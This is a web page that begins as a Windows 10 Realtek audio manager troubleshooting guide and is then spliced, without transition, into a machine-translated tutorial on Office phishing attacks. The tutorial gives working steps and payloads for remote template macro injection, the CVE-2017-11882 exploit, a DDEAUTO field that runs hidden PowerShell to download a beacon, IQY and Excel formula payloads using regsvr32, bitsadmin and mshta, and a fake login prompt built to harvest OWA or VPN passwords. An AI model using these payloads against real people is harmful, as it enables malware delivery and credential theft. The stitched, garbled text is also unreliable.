win10如何下载高清音频管理器? win10没有高清音频管理器问题的解决方法
很多朋友更新win10系统后发现原来的音频管理器不见了,导致电脑失去声音。他们都在问该怎么办以及在哪里下载?今天系统城给大家带来了win10没有高清音频管理器问题的解决方法。如果有遇到同样问题的朋友可以来这里看看。以上内容都是System City为Win10高清音频管理器提供的几种情况和具体解决方案的介绍。查找并更改 settings.xml.rels 文件中的内容。
如何下载win10高清音频管理器? 很多朋友更新win10系统后发现原来的音频管理器不见了,导致电脑失去声音。 他们都在问该怎么办以及在哪里下载? 今天系统城给大家带来了win10没有高清音频管理器问题的解决方法。 如果有遇到同样问题的朋友可以来这里看看。
Win10高清音频管理器缺失的解决方法
情况一:显示方式不正确
1、打开控制面板(Win+X,点击弹出菜单中的【控制面板】);
2. 将右上角的“查看方式”更改为【大图标】。
情况2:驱动未安装
1、下载并安装第三方驱动管理软件,如:Driver Master、Driver Wizard(此处以Driver Wizard为例)
2、驱动向导打开后,点击【立即检测】;
3、检测完成后,点击Realtek HD Audio音频驱动的“安装”;
4、打开安装程序,点击【下一步】开始自动安装。 安装完成后,点击【完成】重新启动计算机;
5.重启后即可打开【realtek High Definition Audio Manager】。
情况3:realtek高清音频管理器未设置
1、首先打开开始菜单,找到里面的“控制面板”并打开。 您也可以通过快速搜索框进行查询。
2、进入控制面板后,点击进入“硬件和声音”界面。
3. 里面可以看到“realtek High Definition Audio Manager”图标,点击打开管理器设置窗口。
4.如果在控制面板中找不到此功能,可以在桌面上打开【此电脑】。 点击进入“C:\Program Files”找到Realtek“文件夹”。
5.然后进入目录“C:\Program Files\Realtek\Audio\HDA”,在里面找到“RtkNGUI64”,双击打开。
6.然后在“设置”中打开Echo,然后打开“选项”。
7. 将“插孔设置”从“HD 音频前面板”更改为“AC97”。
以上内容都是System City为Win10高清音频管理器提供的几种情况和具体解决方案的介绍。 希望对大家有所帮助。 更多相关内容请关注本站系统城感谢您的阅读!
其他避免杀戮的方法:
%E5%AE%8F%E6%94%BB%E5%87%BB%E5%8F%8A%E5%85%8D%E6%9D%80/
2.4 远程模板注入宏代码
利用Word文档加载额外模板时的缺陷发起恶意请求,以达到攻击目的。 因此,当目标用户点击攻击者发送的恶意Word文档时,就可以向远程服务器发送恶意请求,然后加载模板执行。 恶意模板的宏。
发送的文档本身不包含恶意代码,因此可以通过许多静态检测。 只需在远程DOTM文档中写入宏病毒或木马即可。
主意:
用宏代码编写一个DOTM文档并上传到服务器。 编写一个可以远程连接的DOCX文档。 压缩文档。 查找并更改 settings.xml.rels 文件中的内容。 将目标内容修改为服务器上DOTM文档的URL。 DOCX解压后的内容再以存储方式压缩为ZIP,后缀改为DOCX。 打开后可以实现宏文档的远程注入。
按照上面的Word宏钓鱼方法制作。 保存时,保存类型为dotm、fish.dotm,
打开 Web 服务并将其放入其目录中。
http://192.168.2.148:8000/hello.doc
复制
制作文档
直接下载简历
将下载的简历文件后缀由docx改为zip并解压。
将目标内容更改为[:8000/hello.doc](:8000/hello.doc),然后
选择目录中的所有文件并将电子邮件压缩为 yanmie.zip。
然后将zip后缀更改为docx。
无人机已打开,宏已启用,并准备上线。
2.5 CVE-2017-11882
适用于:
MicrosoftOffice 2000MicrosoftOffice 2003MicrosoftOffice 2007 Service Pack 3MicrosoftOffice 2010 Service Pack 2MicrosoftOffice 2013 Service Pack 1MicrosoftOffice 2016MicrosoftOffice 365
复制
Microsoft Office Word 中的任意代码执行方法,无需启用宏即可执行任意程序。
这个功能的初衷是为了更方便地更新word中其他应用程序的内容。 比如一个word文档引用了另一个excel表格中的一项,在excel中可以通过连接字段来实现。 更新word中的内容后同步word中的更新效果的问题在于,该字段的内容可以是公式(或表达式),而这个公式并不限制内容。
GitHub:
https://github.com/Ridter/CVE-2017-11882
复制
使用:
python Command109b_CVE-2017-11882.py -c"cmd.exe /c calc.exe"-otest.doc
复制
生成test.doc文档并打开目标机。Adder成功弹出
无国界医生复发。
项目
https://github.com/0x09AL/CVE-2017-11882-metasploit
复制
exploit/windows/fileformat/office_ms17_11882
复制
有点不稳定,老是上不了网。
与HTA合作上线
exploit/windows/misc/hta_server
http://192.168.2.148:8080/IbsbCdtZ.ht
复制
目标机打开test2.doc,直接上线。
2.5 在word中插入外部对象(OLE)进行欺骗
更改标题以使其更真实
双击并选择“确定”即可上线。
2.6 构建DDE钓鱼文档
创建文档 dde.docx,然后双击打开 dde.docx。 直接Ctrl+f9快捷键可以快速帮助创建域。 我们只需要在大括号中添加以下指令(会弹出一个计算器)。 在实战过程中,您可以远程加载我们的木马。
DDEAUTOc:\\windows\\system32\\cmd.exe"\/k calc.exe"
复制
计算器成功弹出。
这里我们使用ps远程下载马。
进入
DDEAUTO"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.2.148:8000/beacon.ps1'); # ""Microsoft Document Security Add-On"
复制
复制
点击是-→是-→确认后即可上线。
2.7 IQY特色钓鱼
该脚本使用 nishang 下的 Out-WebQuery.ps1 生成一个包含恶意负载 URL 的 iqy 文件。
IYQ可以简单理解为excel内置的特殊“网络浏览器”(无法加载脚本)。 通过IQY【网页查询】语句,可以直接方便地将各种网页上的列表数据导入到当前的excel中,也正是因为如此,才给了我们利用excel制作钓鱼邮件的机会。 如果你要引入的网页数据是入侵者提前准备好的一段payload iqy恶意代码,那么结果就不言而喻了。
使用流程:
新建一个excel文件,找到“数据”→“来自网站”→“地址”,填写你要抓取数据的网站的URL,并选择你要抓取数据的表单。
点击导入
点击确定导入成功
接下来用IYQ打开电脑看看效果。
在我们自己服务器的网站目录下放置一个payload.html文件,内容是IYQ代码
=cmd|'/c calc.exe '!A0
复制
下一步就是按照前面的方法在我们自己的服务器上拉取有效负载文件。
进口
单击“是”弹出计算器
保存文件并在目标机器上打开它
点击启用内容,继续点击是,就会弹出计算器。
其他方法
regsv***
=cmd|'/c regsv*** /s /n /u /i:http://ip/D4zv0M.sct scrobj.dll '!A0
bitsadmin
=cmd|'/c bitsadmin /transfer e822 http://ip/iqy %APPDATA%\e822.exe&%APPDATA%\e822.exe&del %APPDATA%\e822.exe '!A0
mshta
=cmd|'/c mshta http://ip/iqy.hta '!A0
复制
接下来执行shell shell操作
使用的工具:
nishang:https://github.com/samratashok/nishang/releases
复制
首先在kali中准备payload:
exploit/multi/script/web_delivery
复制
使用nishang中提供的Out-WebQuery脚本生成iqy文件
iqy 文件本身的内容非常简单。 只有一个 URL 包含恶意负载:关键在于该 HTML。 我们需要将 HTML 的内容替换为加载我们上面准备的 meterpreter 负载的 iqy 语句: regsv* /s /n /u /i::8080/ZTPzcY6J5.sctscrobj.dll
然后使用nishang-master\Client\Out-WebQuery.ps1生成文件
powershell-execbypass-Command"& {Import-Module ".\Out-WebQuery.ps1";Out-WebQuery -URL http://192.168.2.148:8000/msf.html}"
复制
命令执行成功后,会生成一个iqy文件
接下来,打开Web 服务目录并创建msf.html。 内容是msf刚刚生成的paylaod。
=cmd|'/c regsv*** /s /n /u /i:http://192.168.2.148:8080/ZTPzcY6J5.sct scrobj.dll '!A0
复制
接下来,你可以想办法将之前生成的iqy文件发送给受害者。
当受害者双击打开时,会默认使用Excel打开,并弹出警告。 单击以启用它。
因为之前的iqy文件是使用cmd执行的,所以会继续询问是否启动另一个应用程序CMD.EXE。
单击“是”。 正常情况下,监听的msf会生成一个会话。
利用IQY窃取目标用户密码
powershell-execbypass-Command"& {Import-Module ".\Out-WebQuery.ps1";Out-WebQuery -URL http://192.168.2.1}"
复制
powershell-execbypasscd.\UtilityImport-Module.\Start-CaptureServer.ps1Start-CaptureServer-AuthTypeBasic-IPAddress192.168..2.1-LogFilePathC:\windows\temp\log.txt# 注意此处的认证要选择基础认证,监听的 ip 和上面生成 iqy 文件中的 ip 一致,通常都是本机 i
复制
然后将上一步生成的IQY文件发送到目标无人机并打开。
该验证窗口将连续出现 3 次。 相信这三次之中总会有一个可用的账号和密码,因为目标可能根本不知道这是什么,以为是系统的账号和密码,所以就随便输入了。 其实我们主要是想用它。 此方法可用于捕获可用的 OWA 或 VPN 帐户密码。
2.8 PPT动作按钮功能结构PPSX钓鱼
新型PPT钓鱼攻击分析
首先,创建一个普通的PPTX文件,并填写一些内容,如下图:
这里需要选择空白的。 选择后,在页面中拉出一个触发位置,就会弹出动作设置界面。 选择鼠标悬停-→运行程序
msiexec.exe 是系统进程,是 Windows Installer 的一部分。 利用这个过程来加载我们的shellcode可以达到一定的规避效果。
2.9 超链接
在 PDF 或 Office 文档中嵌入跳转链接是一种非常早期的网络钓鱼方法。 通过短信的引导,要求受害者点击页面。 如果受害人不警惕,受害人的账号、密码、银行卡都有可能被获取。 、身份证等信息。
3. 电子邮件网络钓鱼
搭建邮件服务器相关环境并收集邮件信息,请参见
涵盖伪造(SRC假漏洞、简历、宏文档、合作诱因、技术交流、钓鱼网站、第三方平台)、伪造发件人、office宏钓鱼、exe诱饵等。
4、闪钓
选择域名:
源代码:
自解压或与 xss 捆绑。
详细步骤见1.6。
5. 网站钓鱼
制作钓鱼网站、克隆网站
cs和msf都有这个功能
设置工具包